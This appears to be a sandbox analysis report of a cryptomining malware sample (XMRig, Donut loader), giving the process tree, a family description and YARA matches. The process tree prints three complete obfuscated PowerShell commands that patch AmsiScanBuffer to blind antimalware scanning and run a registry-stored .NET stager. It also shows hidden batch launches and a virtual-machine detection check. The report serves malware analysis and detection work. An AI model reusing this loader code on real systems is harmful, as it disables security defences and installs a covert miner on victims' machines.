  • powershell.exe (PID: 5464 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+'
'+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ivpgsCMtihnowdNIBeH=kveHNQwSSGcg @([String])([IntPtr]);$jwUlbRJyRtiCsTvojnOrQR=kveHNQwSSGcg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mpyIpGuEmdK=$gFfWslPcsIxEF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$scqjgRcUiQSTBu=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$CTojssOdwpNmEymGb=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$ssgLTbT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$ssgLTbT,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+'u'+'f'+'f'+''+'e'+''+[Char](114)+'')));$vxbtwyzgyD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,4,[ref]$vxbtwyzgyD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EVtyXOreozsddqFlq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,0x20,[ref]$vxbtwyzgyD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 5880 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
  • powershell.exe (PID: 6612 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).S
etImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vKwAkflJKGpUwNhZmaw=YrWHxoHyNMxl @([String])([IntPtr]);$qJXsDxxmTbuQfbUlnZoHlQ=YrWHxoHyNMxl 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OQuoHIIkLqL=$XabpoaxiZGEGR.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$VQjNvPkAQyhVaI=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'ib'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$qfeujwJPycmGjtIGB=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$VjfjPYd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$VjfjPYd,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$fXogPYmCjI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,4,[ref]$fXogPYmCjI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZjZDXRvDVpnzBqGGH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,0x20,[ref]$fXogPYmCjI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 
04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 7528 cmdline: C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • powershell.exe (PID: 4240 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](10
1)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+'ddre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LYPstsFMvGDueCuqqFR=NyGuwfckeOJe @([String])([IntPtr]);$RBrwyhNopgzaGFyXfoYzuU=NyGuwfckeOJe 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ngqAWkNvnUU=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ViSGjgKFWHOvJi=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'yA')));$ErlOnVIeWPbCnQNFG=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$JKCdsPm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$aRThctnmCd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,4,[ref]$aRThctnmCd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iERkOmaiRJGubWlVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,0x20,[ref]$aRThctnmCd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 4912 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • cmd.exe (PID: 7788 cmdline: cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2968 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 1868 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1736 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 6564 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cmd.exe (PID: 6248 cmdline: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4832 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2424 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3672 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2676 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 3068 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cmd.exe (PID: 1264 cmdline: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5564 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6344 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7968 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 1028 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
    Source | Rule | Description | Author | Strings
    0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
    • 0x38b6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_5c38878d | unknown | unknown
    • 0x400d:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
    0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
      0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
      • 0x45a1f0:$a1: mining.set_target
      • 0x454f38:$a2: XMRIG_HOSTNAME
      • 0x457018:$a3: Usage: xmrig [OPTIONS]
      • 0x454f10:$a4: XMRIG_VERSION
      0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
        (59 further entries not shown)

        Bitcoin Miner

